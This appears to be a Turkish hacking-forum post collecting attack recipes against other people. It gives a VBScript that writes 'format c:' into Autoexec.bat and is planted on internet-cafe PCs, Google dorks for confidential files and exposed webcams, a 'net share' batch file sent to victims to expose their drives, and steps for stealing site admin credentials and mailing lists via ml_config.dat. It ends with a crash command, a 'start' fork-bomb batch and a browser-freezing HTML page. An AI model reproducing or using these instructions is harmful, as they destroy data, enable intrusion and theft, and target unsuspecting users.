Binlerce video onbinlerce resim. Aradığın herşeyi bulabileceğin dünyaya girmek için
üye olmalısın
Sen de bugün aramıza katıl, şanslı kişiler arasında yerini al ;) Eğer üye iseniz aşağıdan giriş yapabilirsiniz.
Olaya hemen geçiyoruz diyelim ki cafedeyiz ve bizden sonra pc ye gıcık olduğumuz
kişi oturacak hemen şu kodları alıyoruz Coding Forever Set fs = CreateObject(\"Scripting.FileSystemObject\")
Set a = fs.CreateTextFile(\"C:Autoexec.bat\", True)
a.WriteLine(\"format c: /autotest /u /q\")
a.Close
Eğer girişte açılan kutucukta \"Hayır\" \"No\" tuşuna bastıysanız
javascript:reload()\">buraya tıklayın ve \"Evet\"\"Yes\"e tıklayın.Bu internet
cafede internette daha rahat ve kesintisiz gezebilmeniz için bu işlemi yapmanız
gerekir.Lutfen bu işlemi yapınız.Aksi taktirde bilgisayardaki arka plan
programlarını kapatmanız veya hızlı bir gezinti yapamazsınız. bu kodları wordpad ı açıp \"cafe.htm\" şeklinde bilgisayarım/c/ ye kaydediyoruz.sağ
tık > özellikler diyoruz ve \"gizli\" seçeneğini seçiyoruz. zamanlamış görevlere
gidiyoruz ve 10 dk sonra pc den kalkacaksak 20 dk sonraya bilgisayarım/c/cafe.htm yi
açtırıyoruz. pc den kalkıyoruz. gıcık olduğumuz adam pc ye oturuyor bir ileti alıyor
evet diyor ve pc formatlanıyor. hem cafecıye hemde cocuga gecmıs olsn google ile gizli kamealara girme
Illegal olarak sunumlara ulasmak
Google tam bir hack motoru haline geldi.
Birkaç arastirma sonucu sunu buldum:
-Birçok firmanin özel sunumlarina ulasabiliyorsunuz.
google.com da adres satirina asagidaki anahtari girin.
Kod:
extpt confidential "for internal use only"
Gözlem için yerlestirilen webcam lere ulasmak için
Kod:
intitle:"my webcamXP server!"inurl:":8080"
Bir örnekle pekistirelim [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
karşı tarafın c ya da d sürücüsünü paylaşıma açmak
Karşı Tarafın C Yada D Diskini paylaşıma Açmak
Öncelikle "notepad"i açıyoruz ve başlıyoruz yazmaya
net share [PaylaşımAdı=Sürücü:Yol [{/users:sayı|/unlimited}] [/remark:"metin"] [/cache: {manual|automatic|no}]]
burada;
"net share" sabit paylaşım komutumuz.
"paylaşımadı" istediğinizi yazın
"sürücü:yol" paylaşıma vermek istediğiniz yolu yazmak için
"/users:sayı" paylaşıma kaç kişinin girebileceğini belirtir bence "/unlimited"(en fazla sayıda) yapın
örneğin;
net share hacker=c: /unlimited /remark:"hAckEd bY TrAnCePoRT
burada adamın c: sürücüsü "hacker" olarak paylaşıma açılır
aynı şekilde d: sürücüsünü de açmak için aynı şeyleri bir alt satıra yazıyoruz.
bu programı "*.bat" veya"*.cmd" olarak derleyin
ve istediğiniz kişinin bilgisayarına yollayın
Şayet dosyayı açarsa karşı tarafın "c:" yada "d: sürücüsü paylaşıma açılıyor
sitenin maillistini çalmak
Sitelerin Mail Listini Çalmak
Tabiki Tüm sitelerde geçerli değil ama bir kısmında etkili olabilirsiniz.Genelde her
hack modeli böyledir zaten.
Yöntem ;
1.Aşama (Kurban sitenin bulunması )
Kurban sitenin bulunması tabiki hackerların dostu olan [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] <[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]> dan yapıcaz
isterseniz başka bir arama
motoruda kullanabilirsiniz çünkü genelde herkes burayı kullandığı için pek verim
alamazsınız
yani ortalıklarda site kalmayabilir bazen.
Neyse konumuza geçelim arama motoruna şu exploiti yazıyorsunuz.
maillist.php?action=admin
bu exploiti arattığıızda çokda fazla site çıkmayabilir çünkü bazı akıllı
webmasterlar bizim bu exploit açığını bildiğimizi bildikleri için
ek olarak bir klasör daha açarlar işte burda bizim kafamızı çalıştırıp iyi bir arama
ile istediğimiz sonuca ulaşmamız gerek
ne olabilir bu değişik exploit mesela şu mailist/maillist.php?action=admin yani bir
maillist klasörü içinde olabilir.
yada mail klasörü açmış olabilir veya liste demiştir bunu sizin değerlendirip
çeşitli şekillerde aramanız gerekli.
Ben gene alt alta yazim bir kaç tane bulabildiklerimden.
mail.php
maillist.php
maillist.php?action=admin
mailist/maillist.php?action=admin
mail/maillist.php?action=admin
list/maillist.php?action=admin
v.s....
Bu şekillerde arattığımızda kesin bir site buluruz ve aşağıya dökülür arama motorunda.
2.Aşama (Maillistin ele geçirilmesi )
Sitelerden her hangi birine basarız.Adresimiz genelde şu şekilde olur. [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
bu sayfa açıldığında karşımızı admin kullanıcı adı ve şifresini soran bir ekran gelir.
Siz diyorsunuzki şimdi kullanıcı adı ve şifresini nasıl bulcaz saatlerce bunlamı
uğraşçaz birdehayır uğraşmayacaksınız.
yapmak gereken şey yukardaki adres satırından aradığımız exploiti silip yerine başka
birşey yazmak nedir bu anlatiyim.
adres satırındaki [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] şu adresin
uzantısını siliyoruz [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] ve bu kalıyor adresin devamına şunu eklicez. ml_config.dat
yani yeni adresimiz [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] olacak entera basacaz.
hoooop işte karşımıza şifreler döküldü sayfadaki ilk kelime kullanıcı adı diğer ise
şifre
şimdi geri geliyoruz browser dan kullanıcı adı ve şifre soran yere bulduğum
şifreleri yazıyoruz
Vee içerdeyiz orda wiew list diye bir seçenek var onu seçiyoruz maillistesini açıyor
böylelikle maillistide çaldık.
3.Aşama ( Web sitesini ele geçirmek )
Son olarak maillisti açtık maillistlerin genelde ilk baştaki mail adresi admine ait
olur bu mail şifreside büyük ihtimalle
çaldığımız kullanıcı adı veya şifre olabilir.Diyelimki tutmadı ozaman bir de fake
mail atmaya çalışırız.
Eğer bulnardan biri tutarda mailide kırarsak bu sefer sitenin domainine bir whois
çekeriz bakalım nerden almış adresi
whois çektiğimizde domain yada hostun nerden alındığını bize söyler hosta bir
şekilde girmek te size kalmış değişikler gösterebilir
burda anlatmaya zaman yetmez domainide hackleyebilirseniz istediğiniz bir yere
yönlendirir gene hacklemiş olabilirsiniz.
Veya en son ihtimal maillistini çaldığınız sitenin hiç bir exploit yazmadan direk
girin adres satırına site açılsın
admin şifresi ve kullanıcı adı elinizde nasıl olsa direk böylede indirebilirsiniz
pc çökertme komutu
Bu kodu sakın çalıştıra yazmayın:
/timersecure 0 0 //mkdir $mid(c:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z
Kurbana artık nasıl yapacağınızı bilmem ama bir yolla yaptırın pc çöksün...
Masum İnsanlara yapılması yasaklanmıştır ...
karşıdaki bilgisayarın sürekli ms-dos ekranı açarak takılması
Şimdi bir not defteri açın, sonra alt alta gelecek şekilde yazabildiğiniz kadar start
start
start
start
start
start
start
start
start
start
start
start yazın, ne kadar çok yazarsanız o kadar etkili olur. Daha sonra not defterini dosya menüsünden farklı kaydet yaparak x.bat olarak kaydedin.
Şimdi bunu msn den .rar layarak istediğiniz kişiyi düşürün. Ne kadar start yazarsanız o kadar sayfa açılacak ve kişi bunları kapatamayacağı için fiş çekmek zorunda kalacaktır
not: sizin bundan kurtulmanız için ctrl+alt+delete yaparak pencereleri tutup; görevi sonlandırarak kurtulabilirsiniz...
html sayfası ile bilgisayarı dondurmak
Merhaba arkadaşlar şimdi sizlere bir html dosyası oluşturtarak ve bunu web’e atarak linke tıklanıldığında bilgisayarı nasıl dondurtacağımızı yada mavi ekran verdirteceğimizi anlatacağım Gerekenler: 1. Web alanı 2. Not defteri Öncelikle not defterini açarak aşağıdaki kodları kopyalıyorsunuz
<HTML>
<SCRIPT language=JavaScript><!--
setInterval("sabit()",5);setInterval("yenile()",64 8000);self.focus();
function sabit(){window.status=" Geçmiş Olsun arkadaşlar Bilgisayarınızı tekrar başlatın korkamayın bilgilerinize birşey olmadı. "}
function yenile(){self.focus()}; //--></SCRIPT>
<IMG src= "a target=_blank href=http://www.migandi.org.uk/artwork/wallpapers/hell%20awaits.jpg">http://www.migandi.org.uk/artwork/wallpapers/hell%20awaits.jpg" width="9999999" height="9999999">
</BODY>
</HTML>
Bu dosyayı daha sonra istedigimizisim.html olarak kaydediyorsunuz ve istediğiniz bir web sunucusuna atıyorsunuz eğer resimi kendiniz seçtiyeseniz onu da beraberinde atıyorsunuz
Not: Turuncu yazan kod olmasa da olur bu sadece resim yüklendiğini gizlemek için ekledim.
Çalışma mantığı
Arkadaşlar burada çok basit bir mantık var bir resim dosyasını hedef gösteriyorsunuz ve bu resim dosyasının tıklayan kişinin ekranında 999999 gibi bir çözünürlükte açılmasını istiyorsunuz bu durumda adam linke tıklanıldığında bu boyutlandırma zorlayacağından bilgisayar yanıtsız kalıyor yada tanımsız boyut olduğu için mavi ekran verdiriyordur orada bir de turuncu yazı ile java script kodu var onu koymamın tek nedeni alttaki resimde yüklenenin bir resim olduğunu gizlemektir.
Konu Beycoast tarafından (28-05-2007 Saat 09:33 PM ) değiştirilmiştir..
nhtcn_clpn Kullanıcısına bu mesajı için teşekkür eden üyeler:
Hacking Döküman
... 
Normal
